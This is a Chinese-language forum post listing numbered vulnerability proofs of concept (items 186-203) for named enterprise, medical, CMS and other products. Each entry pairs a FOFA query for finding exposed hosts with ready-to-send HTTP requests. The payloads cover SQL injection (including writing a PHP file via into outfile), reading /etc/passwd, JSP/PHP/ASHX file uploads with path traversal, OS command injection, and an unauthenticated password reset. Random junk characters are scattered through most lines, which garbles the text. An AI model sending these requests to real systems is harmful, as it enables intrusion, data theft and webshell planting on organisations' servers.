1 Z. o$ M+ o( ~9 n$ BGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
- W2 G- O, F9 rHost: host
/ u7 s7 k8 Q5 T" M; r2 p
. l6 Q4 e/ V c/ ?4 G5 z4 ]' S+ p6 I' ^
186. F-logic DataCube3 SQL注入
# }. Y% |. N. R* o$ i. s, ^% ^# RCVE-2024-31750/ p- j5 k5 i" N5 y6 f( p
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统( x/ p9 _* e2 l* P- w0 N! Q
FOFA:title=="DataCube3"# I8 k4 u+ Q+ j2 x3 o" A
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
d/ b. L/ R- qHost: your-ip' F) d% s9 N- t/ k% ~# e9 P# X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
: [6 a/ K/ \& S, k/ `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.86 _, C2 Y0 Y6 u; l- p3 F( v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. `' c9 }# g( B V
Accept-Encoding: gzip, deflate. V# k, X; T+ n7 F7 n0 n% l [, \
Connection: close p r5 D' r7 u7 q2 i; t
Content-Type: application/x-www-form-urlencoded* k7 [* s0 z. U) t0 x! j4 h
# w8 L5 L9 f9 L$ j& V
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450! r; u$ M" H2 |$ A5 m5 ^7 {
+ L& w R$ s t' S
9 p1 ]: j% d. R) A7 u. g& j
187. Mura CMS processAsyncObject SQL注入
' f+ ^% K8 O+ H" tCVE-2024-32640
7 g, D/ e: A0 m" M [2 r" m; S; p; Y/ d& YFOFA:"Mura CMS"
" ?$ G- H; f; t1 n6 rPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
! r/ C* G9 F& P6 d& v- @Host: your-ip; e+ d; r; s) U2 e" `( D
Content-Type: application/x-www-form-urlencoded
, T- I* S# V$ o
. _4 ^" F% P/ A) v/ E( t6 z1 m; g1 S2 g
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
0 H" M6 k" z3 `4 H: V' ~
: p: p& \9 U' L' k- T. j' [' z* S9 W
' x; V- E( S4 F& c* B! e$ M- G8 y! A H188. 叁体-佳会视频会议 attachment 任意文件读取
' Y2 x, q2 z' S& qversion <= 3.9.74 e- r, N5 s6 t' ?4 O
FOFA:body="/system/get_rtc_user_defined_info?site_id"
1 B# O3 G3 ]5 Y5 c, q- Z5 zGET /attachment?file=/etc/passwd HTTP/1.19 n% ]9 I ]" b9 x9 W& Y2 H+ q
Host: your-ip
- c% ?0 N, a* t. _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36# Q4 k8 |# a. i6 h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" ?5 ]" }: k. ?
Accept-Encoding: gzip, deflate5 C) I" r/ V! l1 O1 g2 [
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
; N: X3 a0 {0 n7 k) A. h% h8 C; S) lConnection: close( J5 A5 A: l# e* D2 r9 Y
1 L$ ~ M4 j( |5 `
( h" l: n# [4 I# M; k. b0 y
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
8 t; t6 [" Z! C+ MFOFA:app="LANWON-临床浏览系统"
0 _& Y7 F2 C+ u; IGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.16 b3 Z& v5 d( A g
Host: your-ip! c$ K8 ^3 j6 x! T0 V7 v) Y! S; ~/ s2 s3 I
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
; G- K- s6 G: e2 A3 p+ wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) {- x1 S7 m! ~8 p8 I, d# oAccept-Encoding: gzip, deflate/ ]/ v! M6 W. ^9 X
Accept-Language: zh-CN,zh;q=0.9
! R- a1 m# o# h: F+ A/ w+ MConnection: close6 {3 U) |2 Y$ F, S9 G
% |4 ^9 S" h/ d5 M
* v& M1 c6 P1 h
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
6 N! g; p: y/ B4 [7 i3 z2 O7 rFOFA:title=="短视频矩阵营销系统"
: q! F$ Q6 r' h" ~! o! \POST /index.php/admin/Userinfo/poihuoqu HTTP/2
" M# b4 w' e! [, S" F. DHost: your-ip% @# o* o" l/ o g6 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
! i6 d0 Q/ @" g+ GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9+ K8 ?9 i7 c+ u+ K6 H& Y
Content-Type: application/x-www-form-urlencoded
# `: s' B; }- z% S9 c4 V5 wAccept-Encoding: gzip, deflate" K) a( {5 b5 n
Accept-Language: zh-CN,zh;q=0.9
5 ~, W4 l& P# v+ F" z9 A' U2 m5 K7 B7 t
poi=file:///etc/passwd
1 h" W. g0 D$ u8 W2 p$ j% p
6 Q" J+ u# R# n5 Z- n
& r2 K' Y, o& X, _0 E191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
. C- t, c' Z$ S* O F0 oFOFA:body="/CDGServer3/index.jsp"
/ |; C( M# j( j! f; Z! f# y. F, R: O* mPOST /CDGServer3/js/../NavigationAjax HTTP/1.1; } V: m s# N+ ?) E8 z
Host: your-ip$ i; P q: }) L! ~+ T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 x0 m6 I% [+ w7 L( q) I: T8 ~Content-Type: application/x-www-form-urlencoded8 B7 y. C% l: B' @' j7 } M
+ L& f: y4 ~6 d' }8 }3 n) G9 ^
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=7 T+ n; d! }$ S& J
* K7 w& m2 J( N# g$ S" A
; B% }: T. N7 ?8 I4 j192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
; C8 }, ~2 q5 J2 j# h5 q1 @FOFA:title="用户登录_富通天下外贸ERP"
% Y$ ]- o( c5 e# f) _POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1 f8 ?; ^0 T5 s a: z+ K: W
Host: your-ip4 f/ ]4 ~9 l3 B. t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.366 {) o; P8 L2 }2 h) I
Content-Type: application/x-www-form-urlencoded5 W2 m4 t# P- |8 o2 n' W# l
8 X# a1 E+ Y) X3 U
) A) O7 T4 }6 u V
<% @ webhandler language="C#" class="AverageHandler" %> a$ T/ E! @' ^; o0 ?0 G( ^* ^
using System;6 f# v, V1 g5 I3 }# [* \8 v
using System.Web;* D1 H! o2 u% {* J# }$ ~
public class AverageHandler : IHttpHandler$ I* k! {) }- q) O2 w
{
! j6 H' z: ` J5 jpublic bool IsReusable5 b% c: l6 r! x, D/ [
{ get { return true; } }
) F0 E* N( I# |- I O5 D" u" Upublic void ProcessRequest(HttpContext ctx)+ {2 Y7 m a. l8 K2 V2 g( @
{
8 I& u# t% q+ [8 N% G; }+ P" lctx.Response.Write("test");
1 s9 `/ S+ O% W}" k$ A2 p+ w* j7 B
}
- ~! u T5 p6 O5 [
2 N0 K5 ?* A3 `# w8 w, ]( A1 |
* I2 V, r# |& b4 ]+ c193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
! K. t' Q0 {: U/ j7 a a8 eFOFA:body="山石云鉴主机安全管理系统" ?4 U9 A' ?6 f9 V, h
GET /master/ajaxActions/getTokenAction.php HTTP/1.1) c8 g1 Z$ }, H% o" _
Host:) ~5 l+ m; U2 S# A) [3 }' U
Cookie: PHPSESSID=2333333333333;% _: a. i3 i' I* l7 z# o
Content-Type: application/x-www-form-urlencoded
( S( q4 ^2 d+ N" w# T- [: g# k' {( nUser-Agent: Mozilla/5.0
; L$ T1 J; h, m* e# M
0 R' n. T: P- ]& D, s) M6 [! Q% w( o- _1 I5 Z e0 S3 P
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1! f. E- X; h* O: a$ x, ]
Host:& \' P1 U! \9 j8 @# Q" g/ u# r
User-Agent: Mozilla/5.0
; p- F% z* G5 j' K1 A4 g0 C3 iAccept-Encoding: gzip, deflate
* S3 C% f) e4 Z# B1 b5 o4 K. XAccept: */*
" E, ^1 L! |( AConnection: close( R' r9 Q, _: p6 c, w- \% P
Cookie: PHPSESSID=2333333333333;- P- `% u, N3 k# d2 z
Content-Type: application/x-www-form-urlencoded- h' `# @1 h5 }# T) n
Content-Length: 84* Y9 b+ m. @: ?6 _7 A( y( T- t2 V
8 U0 y, R& Y( X3 ]3 j% x/ wparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')' y/ q+ {$ }" ~6 K* }& y; Z
8 J: i5 R4 k( k6 k- P
* q* D/ B, a, l1 i! t" m- k1 V u; TGET /master/img/config HTTP/1.1; Y3 d) [3 q5 o! D- U k
Host:7 ?% D9 X, N$ @! ?2 ^
User-Agent: Mozilla/5.0
F6 c* R2 r+ x Q; j4 I, F" p. j# i8 h# D
5 _ B, o1 ~/ E @
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传! Z# I! f0 v+ e2 B' T. ^
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
4 e. U# T3 W- ~$ I j7 D6 G6 h( m& N% l; Q7 [5 A0 v' `
POST /servlet/uploadAttachmentServlet HTTP/1.15 t/ h" Q1 |) w# d7 k' P
Host: host$ Z8 j4 q. @. @) g$ ?. _4 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.364 n" r& P W% k f+ A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 U! A, R' K& ?$ ]) w4 z) XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; ^& n! L q( z2 E. |. N, ?Accept-Encoding: gzip, deflate# s; w# N9 f$ c" d% x; [9 J
Connection: close
/ J- v4 J* m; _6 \1 c+ y M5 j' ?Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
5 y/ C+ Z ^4 O$ M------WebKitFormBoundaryKNt0t4vBe8cX9rZk
- @4 @3 k" E, X6 {& ~' c
6 b5 s5 p# W+ C8 H6 MContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"' E0 S. {, N2 m2 {! f! W
Content-Type: text/plain
1 U8 g2 S9 R; A X% K' D! x$ Y<% out.println("hello");%>$ m) B* G& h- i
------WebKitFormBoundaryKNt0t4vBe8cX9rZk+ s0 P! l* L% s" h- e0 T
Content-Disposition: form-data; name="json"6 v( X, `% ^! m. d; |
{"iq":{"query":{"UpdateType":"mail"}}}
' {; T1 n: k1 |6 A, O------WebKitFormBoundaryKNt0t4vBe8cX9rZk--' g3 `7 E N/ f9 z7 D) z
9 [3 v: S4 f: D: E( E5 B
7 S1 Y$ X, r# Y. `1 h1 S* Q195. 飞鱼星上网行为管理系统 send_order.cgi命令执行; I, k. q! w- s/ E- D2 U3 m
FOFA:title=="飞鱼星企业级智能上网行为管理系统% i+ z# U* t5 y9 D% r
POST /send_order.cgi?parameter=operation HTTP/1.1+ R5 {7 N6 u S' Q
Host: 127.0.0.1, b/ @" M) ^1 M; d
Pragma: no-cache
; ?2 S0 L) B5 \, ZCache-Control: no-cache* v5 `4 ]/ {* o; @/ Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36/ ?9 m5 _6 B# _5 I, s" w* y4 ?
Accept: */*6 M9 I+ V; l- U/ p& K; r9 R& [. v% h
Accept-Encoding: gzip, deflate0 }; f( a! N; O+ l6 f
Accept-Language: zh-CN,zh;q=0.9
/ v Q7 l. t: V/ M* m/ j0 JConnection: close
1 H _ f9 r) b1 i7 F7 CContent-Type: application/x-www-form-urlencoded4 T9 [9 a2 `: ^9 g7 a$ g4 M
Content-Length: 68
: M6 d/ l5 I. q+ ^
4 Z4 ^+ ], Q% m$ X* W( ?{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}3 l2 Z6 A' U$ a+ i7 o- h
' m* F2 B! o0 t$ T" [4 D% }
8 e( Y! E( W3 h196. 河南省风速科技统一认证平台密码重置$ O$ z: ^, K1 \0 {$ a. I& p
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
/ l( @: U) f6 P8 F2 QPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
I5 F( J! i( q$ SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 h: ^; ~1 O" g2 Z8 F9 n' _
Content-Type: application/json;charset=UTF-86 I# w' ^' T, `6 n5 [
X-Requested-With: XMLHttpRequest( G9 N. ~0 u% o5 o
Host:# Y% n- V2 X# h1 C
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
# Z2 _6 V' y0 {* u7 n9 r. } XContent-Length: 45
4 I9 N+ ?9 X9 _- ~* uConnection: close
% U$ Q; e0 o: a' L& C, d W3 P6 `# Q( B& H
{"xgh":"test","newPass":"test666","email":""}: L- X0 P3 }' t/ E
7 p. a$ B8 V; A- _# ~3 Z) q0 s3 P( g" [6 l) I
9 ?' |5 L6 r5 G/ s7 b197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
$ Y9 L5 o$ v! }1 {5 }2 x7 Z6 HFOFA:app="浙大恩特客户资源管理系统"
Y7 A: b1 g- c( s! S, k1 |3 T5 Q tGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1) J# l4 S/ V0 [" H4 s# z
Host:
$ [1 G1 t% U$ t. ^# b: [! Y2 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36' P0 j2 S; }& Z/ W- A+ D4 ^
Accept-Encoding: gzip, deflate2 u5 D: [4 j' I, W7 R
Connection: close. y7 h" d4 P2 A' E: D
+ O. R: ^8 p) H/ x# g
: F- e; k2 w! T3 C4 ]& G
1 R( F5 b# }2 S! ]198. 阿里云盘 WebDAV 命令注入
n) A' r k" o9 M0 A0 v0 u1 tCVE-2024-29640) u. k0 H) ]$ z$ v
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1; I& v; l) m, ]! m
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
2 i$ S5 @+ f) V- |Accept: */*
4 S/ e" j/ o* R' c. F9 k' OAccept-Encoding: gzip, deflate
7 E" i0 v# U. R% }0 z5 ~Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6+ |0 Z6 r+ o/ G0 M8 @5 X% o+ x
Connection: close
/ k; u% E5 n4 S6 w5 b- {" q) n: C2 [3 F: n- }( t' L' I
/ {7 I& s7 u7 V
199. cockpit系统assetsmanager_upload接口 文件上传/ \5 f+ q6 s. ?6 A
, C7 x& Q' r0 g# s1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:$ K- v; F' \) s" }
GET /auth/login?to=/ HTTP/1.1* N" K7 t$ W) S- R0 e( f% w0 ~
2 U! g6 N' X# u! X响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
. ~0 l h/ R" A9 B, I3 y6 n& A- b. O, S; r' ]; t
2.使用刚才上一步获取到的jwt获取cookie:
! y: M- j2 r% Q& p7 t8 F0 v/ ~3 S; Z8 U3 n# z' Y. _) i* `$ U
POST /auth/check HTTP/1.1
- c5 `1 M7 `' g# @; I1 A8 EContent-Type: application/json3 F$ u/ l8 c$ X& E" W7 d" A, N
) S4 P6 O5 M' N/ P( s, F; l5 X{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}5 K' ?+ a- a$ o9 n7 k h. D- Z
. Y5 H: y+ w* t0 Q$ K
响应:200,返回值:, }4 `6 x( Z% J
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
9 q# c$ l( [1 V* p' }* cFofa:title="Authenticate Please!"
: @( l3 d7 E3 B% K0 B+ X( QPOST /assetsmanager/upload HTTP/1.1% k5 R0 A1 h$ p! I `
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3# z. h" z0 n. T9 C) I( y- T
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92+ j7 L$ x8 j0 L# |2 z
2 U, `$ W; a! {% ]8 S-----------------------------36D28FBc36bd6feE7Fb3; t A- b1 V5 |0 ^. J# ]! `0 r( V
Content-Disposition: form-data; name="files[]"; filename="tttt.php"" A- q: G5 \# z) a+ k: b j+ h c
Content-Type: text/php2 D8 s- e7 T. `" s- w
/ @& A8 L% ] [0 X3 ~<?php echo "tttt";unlink(__FILE__);?>
; W4 {2 u8 P+ z4 J- T2 M-----------------------------36D28FBc36bd6feE7Fb3
$ V" e. H1 B1 j. m. kContent-Disposition: form-data; name="folder"
; n0 u# n; E. V" k' a+ z! w% E5 f
. a5 R: j- {4 R, o+ L' ~1 F6 p2 |$ v-----------------------------36D28FBc36bd6feE7Fb3--
& [9 z+ c Z' r9 p: P+ ~) O$ u/ Z* j6 P3 r) j9 u# m g; E; e
. ]( ? J2 o$ s/ O: @0 e! }/storage/uploads/tttt.php9 i5 U `) y) Q1 |# u5 D
) U* `- _& Z3 _$ Q
200. SeaCMS海洋影视管理系统dmku SQL注入
* P( V! C( u' L' ~FOFA:app="海洋CMS"
; A% k& b5 m$ R( Z/ n NGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1; h' x( s- ^( A5 Z7 k" C% C" l% K
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
+ ]" {, |4 v, h1 x# b( EUpgrade-Insecure-Requests: 1, Y @ }7 E6 U2 e8 `
Cache-Control: max-age=0* f, G, O j y5 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 G$ T$ x) Q$ h" \" p' D
Accept-Encoding: gzip, deflate2 `" f$ E! Y9 B; N O
Accept-Language: zh-CN,zh;q=0.9- D2 R. z& @& j5 r" \% D
* `" b; [" z" u" {
. x3 j8 b8 O. h$ {- E# ^# r
201. 方正全媒体新闻采编系统 binary SQL注入5 T/ `2 h$ n/ r" \6 u* p2 P5 s
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
1 O* k8 Q6 V# |" @$ [POST /newsedit/newsplan/task/binary.do HTTP/1.1
; x0 v$ }/ ^0 H9 n5 vContent-Type: application/x-www-form-urlencoded1 L% W9 A" t% f: g3 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 ^7 G5 u) v7 z& s3 P7 E' @+ e8 B6 \
Accept-Encoding: gzip, deflate3 C" n9 {+ ]! j7 S
Accept-Language: zh-CN,zh;q=0.9, ?# d2 d; }# a7 z' u
Connection: close
3 h% L( O" J' R# v' ]0 [4 O1 B
- d r& s# g4 e9 Y, w& T8 S3 kTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
4 e' {1 g+ S' d8 i- E5 f# |. L: U) H" q) L5 F! p* H6 Q/ m2 i
4 X3 ?! ]% V7 p7 u; Y; ]1 \202. 微擎系统 AccountEdit任意文件上传
* D- ~- Y0 L2 `& h! j9 S1 X2 @FOFA:body="/Widgets/WidgetCollection/"5 B' L( J _' j" R- h
获取__VIEWSTATE和__EVENTVALIDATION值
( o. N9 w y' ~% kGET /User/AccountEdit.aspx HTTP/1.15 M7 a G" x: c, ?+ o: X
Host: 滑板人之家
# w2 `# e" `6 t6 R- K7 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
7 f' |$ R5 C# q. b7 U0 x: |2 }Content-Length: 0' G1 Q- s7 B, b; A
$ {/ Q; X* E5 g6 \* g6 h
& B1 {% X2 L. N' f! q替换__VIEWSTATE和__EVENTVALIDATION值
s/ z/ ?; Y. U3 }* {% a0 NPOST /User/AccountEdit.aspx HTTP/1.1 h3 O# F( e5 [8 ?$ k) N
Accept-Encoding: gzip, deflate, br
6 r/ @3 `4 ]. D# |; BContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687; q% J7 f. _9 U
. y% Y" G+ R3 K7 T-----------------------------786435874t38587593865736587346567358735687
2 }) z, t! I, e5 V. QContent-Disposition: form-data; name="__VIEWSTATE"
! O5 u1 `2 B0 @: \8 r" f$ L: M- o# z
__VIEWSTATE5 x [; ^6 f6 P3 j
-----------------------------786435874t385875938657365873465673587356874 L+ c8 i" I, M# @, t" ^
Content-Disposition: form-data; name="__EVENTVALIDATION"
/ t2 K& ~0 S5 c z+ o! k! e' E0 ]) B7 i$ a. L( b5 ?, w, G
__EVENTVALIDATION
1 [# U: V3 H6 x( o5 T* P# ^: D-----------------------------786435874t38587593865736587346567358735687
" @& [0 n+ F4 q8 LContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"+ S$ j: U: s* F/ m* |7 t. g4 Q
Content-Type: text/plain
0 |$ g/ U. g) g- n& R
0 H- P8 b5 X5 z6 NHello World!: h1 N& T3 a* T( S0 Q$ h
-----------------------------786435874t385875938657365873465673587356876 G% y2 T7 Q7 M ?% R7 V( r
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload", t8 m& D2 F `5 ]8 Y& W" {' f
7 _* ?. r" F% V2 c上传图片
. I& E$ k o! y) ]. R' f% @' }5 O-----------------------------786435874t38587593865736587346567358735687+ d2 m' T+ v1 `! E7 a, Z
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
# s# |2 V# c; O/ }/ h
+ q, Q5 I& q) n2 T- e8 H5 v2 g8 J
0 {! Y$ [. V! }' ?! E- g6 T+ T-----------------------------786435874t38587593865736587346567358735687
# u& D: s& Z( H8 b0 N; nContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"9 l$ b! _* k% T( G9 E% d @
K m& V2 p' A9 w
) @1 } r8 R- I7 ?+ X- f-----------------------------786435874t38587593865736587346567358735687--/ v- f! B$ ~' A! n, R/ R: A
. D. H' Y. @2 Y- B
1 l2 }! c6 n4 \7 y, a3 |# c5 X/_data/Uploads/1123.txt$ M5 F8 i! Y1 L( S; }
1 J' g& P7 f1 P2 a+ ~" X& E$ N& K
203. 红海云EHR PtFjk 文件上传
" V0 d% u( O5 e1 V9 A) @FOFA:body="RedseaPlatform"
4 g1 a7 y# \! WPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1 C$ f: e/ R& u+ R2 D7 N
Host: x.x.x.x( D8 h- k2 Z9 B0 d" u7 `
Accept-Encoding: gzip
5 c0 V7 B; m" A1 h3 L$ h+ x9 LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; T6 [5 L. B, g [1 {5 G7 ~Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4' H5 N+ M6 z8 {: m2 l5 I9 i
Content-Length: 210" a" Q6 W! M( @- A3 ^) H
' v% E9 |' f* G" p
------WebKitFormBoundaryt7WbDl1tXogoZys4
9 `8 O1 z! H3 T2 \3 j1 PContent-Disposition: form-data; name="fj_file"; filename="11.jsp" f# K: C1 p2 `3 Y$ m. J8 ?
Content-Type:image/jpeg
q+ a4 t9 z- i1 R3 P
) ?6 p& e; m9 G- n0 S<% out.print("hello,eHR");%>9 H/ t9 d3 @8 X8 W$ j1 ], l5 @/ H
------WebKitFormBoundaryt7WbDl1tXogoZys4--) G$ U; b4 Q& |0 q3 L# D
, a; L' X) m! Q" b1 ?4 t- G; B 8 W! {* D2 `1 i' F+ J$ }8 u/ x
) k7 [( z& A* p, `3 t* u" C. j. Y
9 [: e+ w6 e' k- D9 J1 ~. ~
4 }# O# d' s' V% l6 X5 R" q |
发表于 2024-6-5 14:31:29
收藏
支持
反对